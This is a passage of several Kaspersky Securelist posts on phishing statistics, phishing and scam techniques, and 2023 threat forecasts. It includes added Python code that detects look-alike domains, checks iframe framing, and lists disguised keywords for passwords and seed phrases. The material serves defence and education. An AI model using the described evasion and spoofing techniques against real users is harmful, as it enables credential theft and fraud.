In 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. However, by the end of the year, the number of phishing attacks on the messenger’s users increased dramatically to 44,700 in October, 83,100 in November and 125,000 in December. This increase is most likely due to several large-scale Telegram account hijacking campaigns that we observed in late 2022 (article in Russian).

Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January — December 2022 (download)

It is worth noting that the majority of these phishing attacks were aimed at users from Russia. While in the first months of 2022 their share was approximately half of the total number of attacks worldwide, from March onwards 70–90% of all attempts to follow phishing links by Telegram users were made by Russian users.

Phishing in messengers

Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them.

In 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.

Distribution of links blocked by the Safe Messaging component, by messenger, 2022 (download)

Phishing activity on WhatsApp is down slightly since 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day. The first half of the year was the most turbulent, and by the third quarter, phishing activity in the messenger had dropped sharply.

Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)

The largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place, where over the year, the Chat Protection component prevented 69,000 attempts to go to fraudulent resources from the messenger.

TOP 7 countries and territories where users most often clicked phishing links in WhatsApp (download)

In contrast to WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. Activity peaked at the end of June and beginning of July, when the number of blocked clicks at times exceeded 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.

Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)

In Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram. Second place went to Brazil, where 3,800 clicks were blocked.

TOP 7 countries and territories where users most frequently clicked phishing links from Telegram (download)

Conclusion

Times of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and departure of individual companies from specific countries’ markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021, but already beginning to wane in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.

Recently, we have seen an increase in targeted phishing attacks in which scammers do not launch the phishing attempt itself immediately, but only after several introductory emails in which they correspond actively with the victim. This trend is likely to continue. New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.

Main phishing and scamming trends and techniques
https://securelist.com/phishing-scam-techniques-tricks/108247/
Tue, 06 Dec 2022 10:00:01 +0000

There are two main types of online fraud aimed at stealing user data and money: phishing and scams. Phishers primarily seek to extract confidential information from victims, such as credentials or bank card details, while scammers deploy social engineering to persuade targets to transfer money on their own accord.

The history of scams and phishing

The term “phishing” was coined back in 1996, when cybercriminals attacked users of America Online (AOL), the largest internet provider at that time. Posing as AOL employees, the scammers sent messages asking users to verify their accounts or asking for payment details. This method of phishing for personal data is still in use today, because, unfortunately, it continues to yield results.

Also in the 1990s, the first online scams appeared. When banks began to roll out internet banking, scammers sent text messages to users supposedly from relatives with an urgent request to transfer money to the details given in the message.

By the early 2000s, charity had become a common scam topic: for example, after the massive Indian Ocean earthquake and tsunami of 2004, users received messages from fake charities pleading for donations. At around the same time, phishers started targeting online payment systems and internet banks. Since user accounts in those days were protected only by a password, it was enough for attackers to phish out this information to gain access to victims’ money. To do this, they sent e-mails in the name of companies such as PayPal, asking users to go to a fake site displaying the corporate logo and enter their credentials. To make their sites look more credible, cybercriminals registered multiple domains all very similar to the original, differing by just two or three letters. An inattentive user could easily mistake a fake for a genuine bank or payment system website. In addition, scammers often used personal information from victims’ own social media pages to make their attacks more targeted, and thus more successful.

As time progressed, online fraud became ever more sophisticated and persuasive. Cybercriminals learned how to mimic the official websites of brands so well that the fakes became almost indistinguishable from the original, and found new ways to approach victims. Services specializing in creating fake content appeared, and at that point phishing really took off. Now not only the personal data and finances of ordinary users were in the firing line, but politicians and big business as well.

This report examines the main phishing trends, methods, and techniques in use in 2022.

Phishing and scams: current types of fraud

Phishing

Phishers can target credentials in absolutely any online service: banks, social networks, government portals, online stores, mail services, delivery companies, etc. But it is customers of top brands that are most often at risk, because people use and trust them more than smaller brands, increasing the likelihood of a successful attack.

To extract the coveted information, cybercriminals try to persuade victims that they are logging in on the real website of the respective company or service, or that they are sharing their credentials with a company employee. Often, fake sites look no different from the original, and even an experienced user might be fooled. Phishers skillfully copy the layout and design of official sites, adding extra details to their pages, such as live chat support (usually inactive), and linking to real services to inspire confidence.

Phishing site with chat support

Recently, alongside online phishing, vishing (voice phishing) has been on the rise. Scammers either call victims directly, or employ various tricks to get them to make the call, after which they attempt to extract their personal data and money over the phone.

Fake message about Windows-related issues in connection with which the victim must call the scammers

Also current is targeted or spear phishing, which, as the name suggests, is aimed at a specific individual or organization. Spear-phishing e-mails and sites are far more personalized than bulk ones, making them very difficult to distinguish from genuine ones.

Scams

While phishers target both businesses and ordinary internet users, scammers prey mostly on the latter. Most scams work by offering the victim an easy way to earn a chunk of money, or the chance to win a valuable prize or get something for free or at a huge discount. The main goal of this type of threat is to raise money, but scammers can also harvest the victim’s personal data to sell later or use in other schemes.

In the screenshot below, for example, the victim is informed they have won a smartphone and asked to pay a small fee to have it delivered, as well as specify their e-mail address, date of birth, gender, phone number, and home address.

Form for collecting personal data to send the bogus prize

In most cases, scammers ask for this data to convince the victim that the prize will indeed be sent, and do not store it. However, some scammers may save all the information entered on their sites for the purpose of later sending malicious e-mails supposedly from victims, using their names and addresses.

Besides promises of easy money and valuable prizes, scammers actively lure users to non-existent dating sites. For example, they might send an invitation to chat with other users, together with a link to a scam site and attractive photos. Once on the fake site, the user is told they can get premium access to the dating platform for next to nothing, but the offer expires today. They just need to sign up and pay a small fee.

Offer to activate a premium account on a fake dating site

There are other ways to attract victims to scam sites: by “selling” sought-after or scarce goods, or trips with like-minded travelers, etc. In general, if something’s popular with users, fraudsters will use it as bait.

Distribution

Although most scams and phishing attacks begin with mass e-mails containing links to fake websites, alternative attack vectors are gaining ground today. There are so many different communication and data sharing platforms that attackers can use to distribute phishing links.

Messengers

One of the main vectors for phishing and scamming is messengers such as WhatsApp and Telegram.

WhatsApp users might receive a fraudulent message from either the cybercriminals themselves or someone in their contact list. To spread their scams, attackers send messages in the name of popular brands or government agencies, but have no qualms about involving users too. In particular, to receive a gift promised in a message, they often get the victim to forward it to all or some of their contacts.

Cybercriminals get the victim to forward a link to a fake giveaway to their WhatsApp contacts

Recently, many channels have appeared on Telegram promising prizes or get-rich-quick cryptocurrency investment schemes. The chats of popular Telegram channels are also home to scammers who, posing as ordinary users, post juicy money-making and other offers. To post comments en masse, cybercriminals can use bots. To discover the secret of easy money, the user is invited to contact the scammers or go to their channel.

Comment in a Telegram chat promoting a currency exchange scheme

Social networks

Comments offering easy profits are also found on social networks, for example, under photos in popular accounts, where messages are more likely to be read than on a page with fewer followers. Cybercriminals invite users to follow a link in a profile header, send them a direct message, or join a secret group chat. A message can also contain a link to a phishing or scam site. Posts promising well-paid part-time work with a link to a mini app are also common on VK, the Russian equivalent of Facebook. In addition, cybercriminals can use social networks to send direct messages to users, promote their offers, or create fake accounts promising valuable gifts, in-game currency, and gift cards. These are hyped up through ads, hashtags, or mass tagging of users in posts, comments, or on photos.

Instagram account “giving away” free smartphones

Marketplaces

Marketplaces act as an intermediary between the user and the seller, to some extent ensuring the security of the transaction for both parties. But their functionality is open to abuse by scammers as well. A widespread scheme on Russian marketplaces is when the seller appears reluctant to communicate on the site and tries to move the conversation to a third-party messenger where they can send a malicious link without fear of triggering the marketplace’s built-in defenses.

Also on marketplaces, scammers often comment on other users’ reviews of products, assuring potential buyers that an item can be purchased for far less elsewhere, and attaching a link to a scam site.

Scammers distribute links to fake sites through comments on product reviews on marketplaces

Phishing and scam attack methods

To carry out attacks, cybercriminals employ a wide range of technical and psychological tricks to dupe as many users as possible while minimizing the risk of detection.

Below are the main phishing and scam techniques used in 2022.

Spoofing

To increase the victim’s trust in a fake resource, scammers often try to make it as similar as possible to the original. This technique is known as spoofing. In the context of website spoofing, there are two main types:

  • Domain spoofing, when attackers fake a website domain to fool users,
  • Content spoofing, when they mimic the appearance of a legitimate site.

It’s common for attacks to deploy both of these.

Domain spoofing involves registering a domain similar to that of the target organization. Phishers are careful to choose domains that don’t look suspicious to victims. Domain spoofing can be divided into three categories:

  • Typosquatting is the use of the original domain name with typos commonly made by users when inputting the URL, such as missing or extra characters, or letters in the wrong order.

Misspelling of the domain Instagram.com, where the number 9 appears instead of the letter “g”

  • Combosquatting is the use of additional words, often related to authorization or online security, in a domain name similar to that of the brand whose users are the target. For example, words like “login”, “secure”, “account”, “verify”, and so on.

The word “account” in a domain name alongside the name of a bank

  • Internationalized domain name (IDN) homograph attacks work by using Unicode characters that closely resemble letters in the Latin alphabet. For example, the most commonly used Cyrillic letters in such attacks are a, c, e, o, p, x, y, because they look identical to Latin a, c, e, o, p, x, y.
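As an added example (not code from the Securelist article), the following Python classifier flags a hostname as typosquatting, combosquatting or an IDN homograph of a protected brand using the three categories described above. The brand list, the combosquatting word list and the edit-distance threshold are assumptions chosen for the demonstration.

```python
import unicodedata
from dataclasses import dataclass
from typing import Optional

# Constructed brand list for the demonstration; a real filter would hold the
# organisation's own domains and the brands it wants to protect.
PROTECTED_DOMAINS = ["instagram.com", "paypal.com", "mybank.com"]

# Words the article lists as typical additions in combosquatting domains.
COMBO_WORDS = ("login", "signin", "secure", "account", "verify", "support")

# The Cyrillic letters the article names as look-alikes, folded to Latin.
CONFUSABLES = str.maketrans("\u0430\u0441\u0435\u043e\u0440\u0445\u0443", "aceopxy")

@dataclass
class Verdict:
    hostname: str
    category: str                # legitimate / idn_homograph / mixed_script /
                                 # combosquatting / typosquatting / unrelated
    impersonates: Optional[str]  # protected domain being mimicked, if any

def decode_idna(hostname: str) -> str:
    """Turn punycode labels (xn--...) back into Unicode so look-alikes show."""
    try:
        return hostname.encode("ascii").decode("idna")
    except UnicodeError:
        return hostname  # already Unicode, or malformed punycode: inspect as-is

def registrable_label(hostname: str) -> str:
    """Second-level label, e.g. 'paypal' for 'www.paypal.com'. Simplified:
    no public-suffix list, so 'co.uk'-style suffixes are not special-cased."""
    labels = hostname.split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]

def scripts_in(label: str) -> set:
    """Unicode scripts of the letters in a label, read from character names
    ('CYRILLIC SMALL LETTER A' -> 'CYRILLIC'); digits and hyphens are ignored."""
    scripts = set()
    for ch in label:
        if ch.isdigit() or ch == "-":
            continue
        scripts.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return scripts

def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insertion, deletion, substitution and
    transposition of adjacent characters each cost 1, which covers the typo
    classes the article lists (missing, extra and swapped characters)."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]

def classify_domain(hostname: str) -> Verdict:
    host = decode_idna(hostname).lower().rstrip(".")
    for d in PROTECTED_DOMAINS:
        if host == d or host.endswith("." + d):
            return Verdict(hostname, "legitimate", d)
    label = registrable_label(host)

    # 1. IDN homograph: a non-Latin script is present; fold the known
    #    confusables and see whether the result is a protected brand.
    if scripts_in(label) - {"LATIN"}:
        folded = label.translate(CONFUSABLES)
        for d in PROTECTED_DOMAINS:
            if folded == registrable_label(d):
                return Verdict(hostname, "idn_homograph", d)
        return Verdict(hostname, "mixed_script", None)

    # 2. Combosquatting: the brand name plus one of the trust-inspiring words.
    for d in PROTECTED_DOMAINS:
        brand = registrable_label(d)
        if brand in label and label != brand and any(w in label for w in COMBO_WORDS):
            return Verdict(hostname, "combosquatting", d)

    # 3. Typosquatting: within a small edit distance of the brand name
    #    (one edit per five characters, at least one).
    for d in PROTECTED_DOMAINS:
        brand = registrable_label(d)
        if label != brand and osa_distance(label, brand) <= max(1, len(brand) // 5):
            return Verdict(hostname, "typosquatting", d)

    return Verdict(hostname, "unrelated", None)

if __name__ == "__main__":
    for h in ["www.paypal.com", "insta9ram.com", "mybank-account.net", "p\u0430ypal.com"]:
        v = classify_domain(h)
        print(h, v.category, v.impersonates)
```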

Content spoofing is used to fake the appearance of a legitimate site. Here, the following methods can be singled out:

  • Legal iFrame Background is when an iFrame is used to load a legitimate site onto a rogue one, on top of which a phishing form is overlaid.

Legitimate site serving as a background for a phishing form

  • HTML spoofing is the visual imitation of a legitimate site by, among other things, partially copying its style and HTML code. Scammers often use software for creating mirror sites, such as HTTrack and Website Downloader.
Comment in the HTML code of a phishing page indicating that HTTrack was used
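The Legal iFrame Background method described above only works if the legitimate site allows other origins to frame it. The check below, added here and not part of the article, reads a response's Content-Security-Policy and X-Frame-Options headers and reports who may embed the page; the header sets are constructed for the demonstration.

```python
from typing import Dict, List

def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a Content-Security-Policy value into {directive: [source, ...]}."""
    policy: Dict[str, List[str]] = {}
    for directive in header.split(";"):
        tokens = directive.strip().split()
        if tokens:
            # Browsers honour the first occurrence of a directive and ignore repeats.
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy

def framing_verdict(headers: Dict[str, str]) -> str:
    """Who may embed this response in an iframe: 'nobody', 'same-origin',
    'allow-list' or 'anyone'. Browsers that support CSP frame-ancestors
    ignore X-Frame-Options when both are present, so CSP is checked first.
    Content-Security-Policy-Report-Only is not enforced and is ignored here."""
    h = {k.lower(): v for k, v in headers.items()}
    csp = parse_csp(h.get("content-security-policy", ""))
    if "frame-ancestors" in csp:
        sources = [s.lower() for s in csp["frame-ancestors"]]
        if not sources or sources == ["'none'"]:
            return "nobody"          # an empty source list also means 'none'
        if all(s == "'self'" for s in sources):
            return "same-origin"
        if any(s in ("*", "http:", "https:") for s in sources):
            return "anyone"          # a scheme-only source matches every host
        return "allow-list"
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "nobody"
    if xfo == "SAMEORIGIN":
        return "same-origin"
    return "anyone"

# Constructed header sets: a policy that forgets framing, beside the hardened one.
WEAK_HEADERS = {
    "Content-Type": "text/html",
    "Content-Security-Policy": "default-src 'self'",
}
HARDENED_HEADERS = {
    "Content-Type": "text/html",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
    "X-Frame-Options": "DENY",  # kept for browsers without frame-ancestors support
}

if __name__ == "__main__":
    print("weak    :", framing_verdict(WEAK_HEADERS))      # anyone
    print("hardened:", framing_verdict(HARDENED_HEADERS))  # nobody
```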

Website hacking

Sometimes it’s easier for scammers to hack others’ sites to host malicious content than to create their own from scratch. Such phishing pages tend to be short-lived, because the site owners quickly detect and remove scam content, as well as regularly patch holes and vulnerabilities in their infrastructure. That said, if cybercriminals break into an abandoned site, phishing pages hosted there can survive a long time. Phishers can exploit compromised sites in several ways:

  • iFrame Injection is when a login form or other part of a phishing page is inserted through an iFrame. Whereas the Legal iFrame Background method involves the use of an iFrame with a legitimate website as the background for a phishing form, in the case of iFrame Injection the URL of the page is legitimate, while the iFrame contains a phishing form, whose background is most often homemade content using brand logos.

Login form created using an iFrame on a hacked site

  • Subfolder Hijacking is the partial hacking of a site to gain access to its subdirectories to place fraudulent content there. Such attacks can either use existing directories on the legitimate site or create new ones.

Home page of a hacked site that looks normal

Phishing page placed in a subdirectory of a hacked site

  • Site Swapping is the complete replacement of a legitimate site with a phishing one. The original content is usually removed.

Using legitimate services

Some internet scammers, instead of bothering to create or hack sites, prefer to exploit the features of services trusted by users. As such, forms for creating online surveys and collecting data (Google Forms, MS Forms, HubSpot Form Builder, Typeform, Zoho Forms, etc.) are very often used to perform an attack.

For example, in the screenshot below, scammers under the guise of technical support for a popular cryptowallet use a Google form to coax identification data out of users, such as e-mail address and secret phrase.

Fraudsters try to finagle confidential data through Google Forms

Although such services have started to warn users about the dangers of sharing passwords through forms, as well as to implement automatic protection (such as blocking forms containing keywords like “password”), this method remains popular with scammers due to the ability to mass-create phishing surveys. To bypass built-in security, they often use text spoofing, that is, they replace characters in keywords with visually similar ones: for example, they write pa$$w0rd instead of password, making such words unrecognizable to automated systems.
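As an added example, not code from the article or from any of the form services it names, here is a Python filter that recognises the text spoofing described above (pa$$w0rd for password) by matching each letter of a blocked keyword against its look-alikes, after folding full-width characters and stripping zero-width ones. The substitution table, the keyword list and the sample form fields are assumptions constructed for the demonstration.

```python
import re
import unicodedata
from typing import Dict, List

# Letter substitutions commonly used to disguise keywords (constructed table;
# the article cites "pa$$w0rd" as the pattern).
CONFUSABLE_CLASSES = {
    "a": "a4@",
    "b": "b8",
    "e": "e3€",
    "g": "g9",
    "i": "i1!|",
    "l": "l1|",
    "o": "o0",
    "s": "s5$z",
    "t": "t7+",
}

# Hypothetical block list for a form builder; the article mentions "password"
# and a wallet's "secret phrase" as data phishers ask for.
BLOCKED_KEYWORDS = ("password", "passphrase", "secret phrase", "seed phrase")

# Up to two punctuation or space characters may be wedged between letters
# ("p.a.s.s.w.o.r.d", "pass-word").
SEPARATOR = r"[\W_]{0,2}"

# Invisible characters that split a keyword without changing how it renders.
ZERO_WIDTH = dict.fromkeys(map(ord, "\u200b\u200c\u200d\u2060\ufeff\u00ad"), None)

def keyword_pattern(keyword: str) -> "re.Pattern[str]":
    """Build a regex in which each letter also matches its look-alikes."""
    parts = []
    for ch in keyword:
        if ch == " ":
            parts.append(r"[\W_]*")  # a space may be dropped, doubled or replaced
        else:
            parts.append("[" + re.escape(CONFUSABLE_CLASSES.get(ch, ch)) + "]")
    return re.compile(SEPARATOR.join(parts), re.IGNORECASE)

PATTERNS = {kw: keyword_pattern(kw) for kw in BLOCKED_KEYWORDS}

def normalize_text(text: str) -> str:
    """NFKC folds full-width and other compatibility forms ('ｐ' -> 'p');
    zero-width characters are stripped so they cannot split a keyword."""
    return unicodedata.normalize("NFKC", text).translate(ZERO_WIDTH)

def find_spoofed_keywords(text: str) -> Dict[str, List[str]]:
    """Map each blocked keyword to the disguised spellings found in text."""
    cleaned = normalize_text(text)
    hits: Dict[str, List[str]] = {}
    for kw, pat in PATTERNS.items():
        found = [m.group(0) for m in pat.finditer(cleaned)]
        if found:
            hits[kw] = found
    return hits

def form_should_be_blocked(fields: List[str]) -> bool:
    """True if any field label or description asks for a blocked secret."""
    return any(find_spoofed_keywords(f) for f in fields)

# Constructed form fields, imitating a bogus "wallet support" survey.
SAMPLE_FIELDS = [
    "Your e-mail address",
    "Enter your pa$$w0rd",
    "Wallet s3cr3t\u200b phr4se (12 words)",
    "Type your ｐ.a.s.s.w.o.r.d again",
]

if __name__ == "__main__":
    for field in SAMPLE_FIELDS:
        print(repr(field), "->", find_spoofed_keywords(field))
```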

Besides forms, cybercriminals make active use of cloud documents. Not least, they can send e-mails with a link to a document in a legitimate service that contains a phishing link.

Avoiding detection

Scammers use various techniques to hide from detection. Some are quite effective but not so common, because they require more advanced technical know-how than many scammers possess.

One method to avoid detection is obfuscation, where the user-invisible source code of a scam page is scrambled to make the attack hard to detect by automated means. We talked in detail about obfuscation methods in our post about the phishing-kit market.

Another way to protect a scam site from detection is to hide page content from automated analysis. Here are some of the methods:

  • Use of images. If text is replaced with images of text, content engines will be unable to see and analyze the text, while users will still be able to read it.
  • Browser notifications. Links to scam resources can be distributed through browser notifications. Unlike e-mails and public websites, browser notifications are processed in several stages, and not all anti-phishing engines analyze them. This allows cybercriminals to bypass at least some detection technologies.

To download a song on a scam site, the user is asked to allow browser notifications from that site

  • Pop-up windows. Scam content can open in pop-up windows on a site. Pop-up windows load later than the site’s main window, so not all anti-phishing technologies see them. In addition, pop-up windows furnish attackers with additional tools to copy the appearance of a legitimate site. In particular, cybercriminals can use the Browser-in-the-Browser method, when a pop-up window imitates a browser window with an address bar showing the URL of a legitimate site.

Browser-in-the-Browser attack: a pop-up window mimics a browser window with an address bar

Along with content, scammers try to hide the URLs of malicious sites from detection technologies. For this purpose, they can use:

  • URL links randomly generated using hashes. Each victim receives a unique link, which makes it difficult to block a malicious site.
  • URL shorteners. Attackers can mask malicious addresses using legitimate URL shorteners, such as bit.ly.

Social engineering elements

Cybercriminals’ tricks often target the user rather than vulnerabilities in the security system. Scammers use their knowledge of human psychology to deceive victims, and such tricks can be combined with technical means to devastating effect.

  • Fake CAPTCHA. Cybercriminals mimic CAPTCHA technology on scam sites to persuade victims to perform certain actions.

Fake CAPTCHA on a phishing page asking for permission to show browser notifications, supposedly to prove you’re not a robot

  • User-Related Dynamic Content. The page content changes depending on the user and their data, such as e-mail address: to fake the domain, images are downloaded from the user’s mail and inserted into the phishing page.

Attackers use the victim’s mail domain to create content on a scam site

  • Intimidation and threats. Cybercriminals can intimidate victims to make them panic and act rashly. For example, they may threaten legal action and demand payment of a “fine” for the victim to be left in peace. Attackers can also threaten to block the victim’s account to force them to click a phishing link.

Scammers threaten to seize all the user’s property and accounts if they fail to pay off a bogus debt

  • Time pressure. Attackers give victims a limited time window to respond to their message in one way or another to make them act rashly.

Scam site demands urgent payment of “COVID-19-related expenses” for delivery of a parcel

  • An appeal to pity. Cybercriminals try to arouse people’s sense of pity to get them to part with their cash.
  • Lucrative offers. Scammers tempt victims with lip-smacking offers that are hard to refuse.

Cybercriminals lure the user with the chance to win an Amazon gift card

Conclusion

Most users today are more or less aware of the current web threats. Many have either experienced internet scams themselves, or know about them from the news or other sources, making it harder for attackers to dupe victims and so requiring the use of ever more sophisticated methods. Instead of slapdash phishing and scam sites, high-quality fakes are becoming increasingly common. This includes mimicking a browser window with a legitimate URL in a pop-up window, as well as phishing pages with a legitimate site in the background, loaded via an iFrame. We’ve also seen elements of targeted attacks in phishing and scams, such as downloading content related to the target’s mail domain or using data obtained from large-scale leaks to make contact with potential victims.

At the same time, vishing is on the rise, because it’s easier to apply pressure over the phone, giving the victim no time to mull things over. In addition, cybercriminals use other available communication channels: e-mail, popular messengers, social networks, marketplaces.

To implement attacks, they employ a variety of techniques, such as spoofing, social engineering, site hacking, and code and content hiding. Alongside this, detection avoidance methods also continue to evolve. Attackers are increasingly using one-time generated links with hashes to prevent web threat detection technologies from blocking them.

Note, too, that scammers continue to base their malicious campaigns on the hottest topics in the news. If there’s a major event going on somewhere, a problem on a country or global scale, or some service or technology is becoming all the rage, be sure that cybercriminals will seek to exploit it. For instance, the lockdown period was beset by large-scale “financial aid” scams, while last year’s upturn in cryptocurrency prices went hand in hand with numerous fraudulent investment schemes. So it pays to be vigilant online, especially when it comes to money: no matter how much you want to believe that good fortune has fallen from the sky, if something sounds too good to be true, it probably is.

Cybersecurity threats: what awaits us in 2023?
https://securelist.com/cybersecurity-threats-2023/107888/
Wed, 09 Nov 2022 08:00:23 +0000

Knowing what the future holds helps us prepare better for emerging threats. Every year, Kaspersky experts prepare forecasts for different industries, helping them build a strong defense against the cybersecurity threats they might face in the foreseeable future. Those predictions form the Kaspersky Security Bulletin (KSB), an annual project led by Kaspersky experts.

For KSB 2022, we invited notable experts to share their insights and unbiased opinions on what we should expect from cybersecurity in the coming year. The contributors include representatives of government institutions: H.E. Dr. Mohamed Al Kuwaiti (UAE Cyber Security Council), and of public organizations: Kubo Mačák, Tilman Rodenhäuser, Mauro Vignati (ICRC), Serge Droz (FIRST), Sven Herpig (the think tank Stiftung Neue Verantwortung). We would also like to thank Prof. Dr. Dennis-Kenji Kipker (the University of Bremen; European Academy for Freedom of Information and Data Protection (EAID)), Arthur Laudrain (The Hague Centre for Strategic Studies) and Stefan Soesanto (The Center for Security Studies (CSS) at ETH Zurich) for their profound scientific contributions. We also included predictions from our fellow commercial organizations: James Range (White Rock Security Group) and Irena Yordanova (Polycomp Ltd.).

The opinions shared by the contributing experts demonstrate the complexity of the modern cybersecurity industry and the strong need for collaboration among different organizations in order to combat the cyberthreats to which companies, individuals and even whole countries are exposed.

What cyberthreats for business will be the greatest in 2023?

Vladimir Dashchenko, Security Evangelist, Kaspersky

The ongoing geopolitical storm brings not only classical cyberthreats for business, but also unpredictable risks and ‘black swans’. The main problem for 2023 will be supply-chain stability and cybersecurity. While the supply chain is a big challenge for business right now, its cybersecurity is not merely an issue, it’s a major problem. The supply chain will become more of a sweet spot for targeted ransomware and state-sponsored espionage campaigns.

Another big issue is the global semiconductor shortage. This will definitely play its role in corporate cybersecurity. While many companies need increasingly more computing power (servers, workstations, network hardware and so on), the price of the equipment continues to rise. There’s a possibility that, to cover hardware needs, some businesses will have to cut planned cybersecurity expenses.

Yury Slobodyanuk, head of content filtering research, Kaspersky

I think we will continue seeing attacks targeting the infrastructure of different countries and organizations. Phishing attacks are going to become even more sophisticated, since a lot of basic tactics have already been tried this year, and businesses learned to repel those.

Ivan Kwiatkowski, senior security researcher, Global Research and Analysis Team, Kaspersky

Businesses will still be mostly concerned with ransomware. The conflict between Russia and Ukraine has marked an end to any possible law enforcement cooperation in the foreseeable future. We can therefore expect that cybercrime groups from either bloc will feel safe to attack companies from the opposing side. Some may even perceive this as their patriotic duty. The economic downturn (caused by energy prices, inflation, sanctions, etc.) will lead more people to poverty, which always translates to increased criminality (cyber or otherwise), and we know ransomware to be extremely profitable.

James Range, President of White Rock Security Group

Zero trust will take on greater prominence with the continued role of the remote and hybrid workplace. Remote work will continue driving the need for zero trust since hybrid work is now the new normal. With the federal government mandating agencies to adopt zero-trust network policies and design, we expect this to become more common and the private sector to follow suit as 2023 becomes the year of verifying everything.

Arthur Laudrain, Strategic Analyst (Cyber Program), The Hague Centre for Strategic Studies

In 2023, we might see a slight decline in the raw number of ransomware attacks, reflecting the slowdown of the cryptocurrency markets. However, ransomware operators will keep professionalizing their operations and will target higher value organizations. At the same time, state-sponsored attacks will remain high in the threat landscape, with no ease of geopolitical tensions with Russia, China, North Korea, and Iran in sight. Businesses most at risk are aerospace and defense contractors, as well as critical infrastructure operators (utilities such as water, electricity, and Internet, but also hospitals and operators of large cyber-physical systems such as dams).

Stefan Soesanto, Senior Cyber Defense Researcher, The Center for Security Studies (CSS) at ETH Zürich

    If I had a magic 8-ball, I would predict that the greatest cyberthreats to businesses in 2023 will be (a) a significant increase in foreign intelligence services conducting operations under the cover of hacktivist groups, fighting big oil, climate change, fiscal policies etc. And that (b) we are also likely to see a steep increase in DDoS extortion campaigns as the cyberwar in Ukraine leads to all-time-high levels of DDoS attacks.

    Irena Yordanova, Product Manager Software, Polycomp Ltd.

    We expect cyberthreats to rise in 2023, as unrest in the world contributes to an increase in cybercrimes. Malware attacks like ransomware will happen to businesses more frequently. And IT teams should be prepared to deal with evolving threats posed by emerging technologies which are becoming widespread, such as geo-targeted phishing or attacks related to cloud security, IoT and AI. Most probably more attacks on the education and healthcare sectors will occur plus targeted campaigns against industry leaders – especially those that hold critical information: sensitive data, top expertise, and latest technologies. Given that, employees should be educated and equipped to fight these mature attacks; and their companies can contribute by having experienced outside security partners to support them on this issue. End-users can prepare themselves with an easy-to-use security solution for upcoming challenges, whether it’s phishing attacks or threats related to multiple layers of security.

    What cybersecurity challenges will industries face next year?

    Vladimir Dashchenko, Security Evangelist, Kaspersky

    Threat modeling approaches will be changed in 2023. Internet ‘balkanization’, ongoing military conflicts, changes, and tensions in existing political groups of countries are influencing cyberspace and cybercrime. We will see an increasing number of cybercriminals taking political sides and breaking the law with political statements. Also, script kiddies (low-skilled hackers) will more often be joining groups of cybercriminals led by more skilled perpetrators, or state-sponsored hackers.

    The major challenge for cybersecurity itself will be a lack of transparency and information sharing between companies. It will be extremely difficult to follow the ‘business as usual’ concept and remain neutral. Global political conglomerates will unfortunately influence cyberspace and cybersecurity.

    Arthur Laudrain, Strategic Analyst (Cyber Program), The Hague Centre for Strategic Studies

    Next year should see a continuation of existing trends. In particular, governments, critical infrastructure operators, and businesses with a large international footprint will face the continued challenge of ensuring the safety and integrity of their supply chains, both in terms of software and hardware. Often, this will require closer integration with their contractors and suppliers, not least to comply with new regulatory obligations in the U.S. and the E.U.

    James Range, President of White Rock Security Group

    Given the continued surge of ransomware attacks, which soared 288% in the first half of 2022 alone, the need for cyber insurance will be a bigger priority, especially in the SMB market. Although many industry experts argue against payouts, making cyber coverage a controversial topic, the evolving threat landscape means cyber insurance should be a top consideration as part of organizations’ cyber strategy. As such, we anticipate a booming cyber insurance industry as many organizations heed these warnings and seek to guard against ransomware attacks. Yet, in addition to cyber insurance, companies will need a designated DR or RR (Rolling Recovery) plan.

    Kubo Mačák, Legal Adviser, Tilman Rodenhäuser, Legal Adviser, Mauro Vignati, Adviser on Digital Technologies of Warfare, ICRC

    A key concern for 2023 is that civilians will be further impacted by cyber operations during armed conflict. Civilian data, devices, and networks – such as government services, critical infrastructure, or companies – risk being deliberately disrupted or damaged, often in violation of the laws of war. Civilians – individuals and companies – may get drawn into digital warfare activities, encouraged to engage in cyber operations or to support kinetic military operations through digital means. Such developments put people and societies in danger and undermine the cardinal rule that belligerents must at all times distinguish between what is military and what is civilian.

    Stefan Soesanto, Senior Cyber Defense Researcher, Center for Security Studies (CSS)

